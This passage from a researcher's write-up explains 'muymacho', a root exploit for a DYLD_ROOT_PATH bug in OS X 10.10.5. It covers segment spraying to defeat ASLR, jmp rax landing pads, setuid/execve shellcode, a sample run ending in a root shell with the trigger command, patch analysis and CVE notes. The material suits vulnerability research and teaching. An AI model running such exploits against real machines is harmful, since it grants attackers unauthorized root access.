The left hand side shows the original maximum vmaddr (0x7ffe6fc1c000) replacing the highest possible dyld_target. All the other pages are superfluous, since we are already at the maximum possible vmaddr and the highest possible dyld_target. Only one page from this segment could hit a possible dyld_target.
The right hand side uses the adjusted vmaddr (0x7ffe6ec1d000). The segment will replace the highest possible dyld_target. All 4096 segment pages could replace possible dyld_target pages.
Payload
The Bypassing ASLR section ensures a segment will be mapped over dyld_target. The payload is 0x1000000 bytes, or 4096 pages, in total. One of those pages will replace the dyld_target page.
The dyld mmap system call is shown again below.
00007FFF5FC26DBC ___mmap proc near ; CODE XREF: _mmap+31p
00007FFF5FC26DBC mov eax, 20000C5h
00007FFF5FC26DC1 mov r10, rcx
00007FFF5FC26DC4 syscall
00007FFF5FC26DC6 jnb short locret_7FFF5FC26DD0
When the mmap system call returns, execution will continue at offset 0xdc6 in the page. Since rax is used as a return value, it will contain the base address of the newly mapped memory. In other words, rax points to the start of our payload.
All 4096 payload pages contain a jmp rax at offset 0xdc6. The first page at the base of the payload also contains the shellcode at offset 0.
The following diagram shows the base page and a standard page.
Regardless of which page lines up with dyld_target, the jmp rax instruction will be executed leading to the shellcode.
The shellcode then performs a setuid(0) system call followed by an execve(‘/bin/sh’) system call.
Finished exploit
This section combines everything we’ve figured out thus far. In summary:
- Our goal is to remap dyld_target, which is the page containing the mmap system call within dyld
- We use 32 segments spanning 0x20000000 bytes to bypass ASLR
- We implement a top down strategy
- The first segment has a vmaddr of 0x7ffe6ec1d000
- Each subsequent segment’s vmaddr is 0x1000000 lower than the previous one
- All the segments point to the same 4096 pages of payload
- All pages contain a jmp rax instruction at offset 0xdc6
- The base page contains our shellcode
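The segment layout in the summary above can be checked with a little arithmetic. This is only a sketch of the address calculation, with constant names of my own choosing; it is not taken from muymacho itself and does not build a Mach-O file.

```python
PAGE_SIZE = 0x1000
SEGMENT_SIZE = 0x1000000
SEGMENT_COUNT = 32
FIRST_VMADDR = 0x7ffe6ec1d000

# Range of vmaddr values that must be covered to negate ASLR.
VMADDR_MIN, VMADDR_MAX = 0x7ffe4fc1e000, 0x7ffe6fc1c000

# Top down: each segment starts one segment size below the previous one.
vmaddrs = [FIRST_VMADDR - i * SEGMENT_SIZE for i in range(SEGMENT_COUNT)]

lowest_page = vmaddrs[-1]
highest_page = vmaddrs[0] + SEGMENT_SIZE - PAGE_SIZE  # last page of segment 0
print(hex(lowest_page), hex(highest_page))
print(lowest_page <= VMADDR_MIN and highest_page >= VMADDR_MAX)
```

The top page of the first segment lands exactly on the maximum vmaddr, and the lowest segment starts one page below the minimum.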
muymacho is written in Python and is available on GitHub. There is a very minimal Mach-O implementation in the MachoFile and LC_SEGMENT_64 classes. They create a dyld_sim file containing 32 segments, all pointing to the payload.
muymacho is passed a base directory and will create the necessary directory structure and dyld_sim file. The actual exploitation requires setting DYLD_ROOT_PATH to the base directory and executing a suid binary. A sample run is shown below.
user@yosemite:~/tmp$ python muymacho.py ~/tmp
muymacho.py - exploit for DYLD_ROOT_PATH vuln in OS X 10.10.5
Luis Miras @_luism
[+] using base_directory: /Users/user/tmp
[+] creating dir: /Users/user/tmp/usr/lib
[+] creating macho file: /Users/user/tmp/usr/lib/dyld_sim
LC_SEGMENT_64: segment 0x00 vm_addr: 0x7ffe6ec1d000
LC_SEGMENT_64: segment 0x01 vm_addr: 0x7ffe6dc1d000
LC_SEGMENT_64: segment 0x02 vm_addr: 0x7ffe6cc1d000
LC_SEGMENT_64: segment 0x03 vm_addr: 0x7ffe6bc1d000
LC_SEGMENT_64: segment 0x04 vm_addr: 0x7ffe6ac1d000
LC_SEGMENT_64: segment 0x05 vm_addr: 0x7ffe69c1d000
LC_SEGMENT_64: segment 0x06 vm_addr: 0x7ffe68c1d000
LC_SEGMENT_64: segment 0x07 vm_addr: 0x7ffe67c1d000
LC_SEGMENT_64: segment 0x08 vm_addr: 0x7ffe66c1d000
LC_SEGMENT_64: segment 0x09 vm_addr: 0x7ffe65c1d000
LC_SEGMENT_64: segment 0x0a vm_addr: 0x7ffe64c1d000
LC_SEGMENT_64: segment 0x0b vm_addr: 0x7ffe63c1d000
LC_SEGMENT_64: segment 0x0c vm_addr: 0x7ffe62c1d000
LC_SEGMENT_64: segment 0x0d vm_addr: 0x7ffe61c1d000
LC_SEGMENT_64: segment 0x0e vm_addr: 0x7ffe60c1d000
LC_SEGMENT_64: segment 0x0f vm_addr: 0x7ffe5fc1d000
LC_SEGMENT_64: segment 0x10 vm_addr: 0x7ffe5ec1d000
LC_SEGMENT_64: segment 0x11 vm_addr: 0x7ffe5dc1d000
LC_SEGMENT_64: segment 0x12 vm_addr: 0x7ffe5cc1d000
LC_SEGMENT_64: segment 0x13 vm_addr: 0x7ffe5bc1d000
LC_SEGMENT_64: segment 0x14 vm_addr: 0x7ffe5ac1d000
LC_SEGMENT_64: segment 0x15 vm_addr: 0x7ffe59c1d000
LC_SEGMENT_64: segment 0x16 vm_addr: 0x7ffe58c1d000
LC_SEGMENT_64: segment 0x17 vm_addr: 0x7ffe57c1d000
LC_SEGMENT_64: segment 0x18 vm_addr: 0x7ffe56c1d000
LC_SEGMENT_64: segment 0x19 vm_addr: 0x7ffe55c1d000
LC_SEGMENT_64: segment 0x1a vm_addr: 0x7ffe54c1d000
LC_SEGMENT_64: segment 0x1b vm_addr: 0x7ffe53c1d000
LC_SEGMENT_64: segment 0x1c vm_addr: 0x7ffe52c1d000
LC_SEGMENT_64: segment 0x1d vm_addr: 0x7ffe51c1d000
LC_SEGMENT_64: segment 0x1e vm_addr: 0x7ffe50c1d000
LC_SEGMENT_64: segment 0x1f vm_addr: 0x7ffe4fc1d000
[+] building payload
[+] dyld_sim successfully created
To exploit enter:
DYLD_ROOT_PATH=/Users/user/tmp crontab
user@yosemite:~/tmp$ DYLD_ROOT_PATH=/Users/user/tmp crontab
bash-3.2#
Patch
El Capitan made many changes to dyld. In particular, the validation on the dyld_sim file is much more strict, closing the vulnerability muymacho uses. There are various checks to ensure that consecutive segments have appropriate fileoff and vmaddr values.
At the time of this post, Apple has not yet released El Capitan source code. The changes can be examined in IDA Pro.
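To give a feel for why stricter segment validation defeats this layout, here is a purely hypothetical check written in Python. It is not Apple's logic, which this post has not reproduced. It simply assumes a rule where each segment must begin exactly where the previous one ended, both in the file and in memory. The `Segment` tuple, the function name and the file offsets are invented for the example.

```python
from collections import namedtuple

Segment = namedtuple("Segment", "vmaddr vmsize fileoff filesize")


def segments_are_contiguous(segments):
    """Hypothetical rule: each segment starts where the previous one ended."""
    for prev, cur in zip(segments, segments[1:]):
        if cur.fileoff != prev.fileoff + prev.filesize:
            return False
        if cur.vmaddr != prev.vmaddr + prev.vmsize:
            return False
    return True


SIZE = 0x1000000

# muymacho-style layout: descending vmaddr, every segment reuses one file range.
exploit_layout = [Segment(0x7ffe6ec1d000 - i * SIZE, SIZE, 0x1000, SIZE)
                  for i in range(32)]

# A conventional layout: ascending vmaddr and fileoff with no gaps or overlap.
normal_layout = [Segment(0x100000000 + i * SIZE, SIZE, i * SIZE, SIZE)
                 for i in range(3)]

print(segments_are_contiguous(exploit_layout))   # False
print(segments_are_contiguous(normal_layout))    # True
```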
Conclusion
This concludes the majority of the post (be sure to check out the super sekret debug shellcode). We’ve discussed a vulnerability from discovery, through potential problems, to exploitation. The complete exploit is on GitHub.
I hope this post has been helpful. It was a fun bug and I very much enjoyed writing muymacho.
Thanks to everyone (Pete Markowsky, Ian Melven, Josha Bronson) that reviewed this post. Also thanks to @iOn1c for posting his challenge which led to finding this bug.
super sekret debug shellcode
Sometimes I am curious as to which segment was used in exploitation as well as the various ASLR addresses. In practice, the actual addresses are irrelevant. I included a debug shellcode that provides this information back to the user.
The super sekret debug shellcode is selected by passing a “-d” command line switch. After muymacho returns with the hashtag symbol (aka #), be sure to type in:
echo "$MUYMACHO"
Feel free to take a look at the debug shellcode in muymacho. Debug information is passed through the execve call in an environment variable.
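The mechanism is easy to demonstrate outside the exploit. The sketch below uses Python's subprocess module as a stand-in for the shellcode's direct execve call: it starts /bin/sh with an environment that contains a MUYMACHO variable and then reads it back the same way you would at the root prompt. The helper name and the contents of the variable are made up, since the real format is whatever the debug shellcode writes.

```python
import subprocess


def run_with_debug_env(debug_info):
    """Start /bin/sh with MUYMACHO set and echo it back."""
    env = {"MUYMACHO": debug_info}   # the environment handed to the new process
    result = subprocess.run(
        ["/bin/sh", "-c", 'echo "$MUYMACHO"'],
        env=env,
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.rstrip("\n")


# Hypothetical debug string; the real shellcode chooses its own format.
print(run_with_debug_env("segment=0x05"))
```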
Appendix
10.10.4 and prior
Mac OS X 10.10.4 and prior have an additional DYLD_ROOT_PATH vector. This section discusses the older vector and the 10.10.5 update. OS X 10.10.4 uses dyld.cpp from dyld-353.2.1.
Early in the useSimulatorDyld() code, there is a check to verify that dyld_sim is owned by root.
    // verify simulator dyld file is owned by root
    struct stat sb;
    if ( fstat(fd, &sb) == -1 )
        return 0;
    if ( sb.st_uid != 0 )
        return 0;
While auditing the function, it becomes apparent that the code signing requirement is optional. Thus, the only requirement is a root-owned, unsigned dyld_sim, which isn’t too high of a barrier. useSimulatorDyld() will gladly load and execute it.
10.10.5 update
The 10.10.5 update brought fixes for the DYLD_PRINT_TO_FILE vulnerability (CVE-2015-3760, credited to beist of grayhash and Stefan Esser). It also included changes to the useSimulatorDyld() function, likely due to the discovery of the previous vector.
dyld_sim no longer needs to be owned by root; however, code signing is now mandatory. The following code snippet is from dyld.cpp.
    int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
    if ( result == -1 ) {
        dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
        return 0;
    }
A new fcntl command was added in 10.10.5 specifically for dyld_sim. The following excerpt is from /usr/include/sys/fcntl.h.
#define F_ADDFILESIGS_FOR_DYLD_SIM 83 /* Add signature from same file, only if it is signed by Apple (used by dyld for simulator) */
dyld_sim needs to be signed by Apple; a developer certificate is not sufficient.
CVE number
It is somewhat unclear what CVE number this bug has been assigned. The El Capitan security update lists the following bug credited to beist:
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
The same CVE is also listed in the iOS 9 and watchOS 2 updates. A cursory examination of dyld from iOS 8.4.1 did not reveal the same vulnerability muymacho exploits. I could be mistaken and will update this post if that is the case.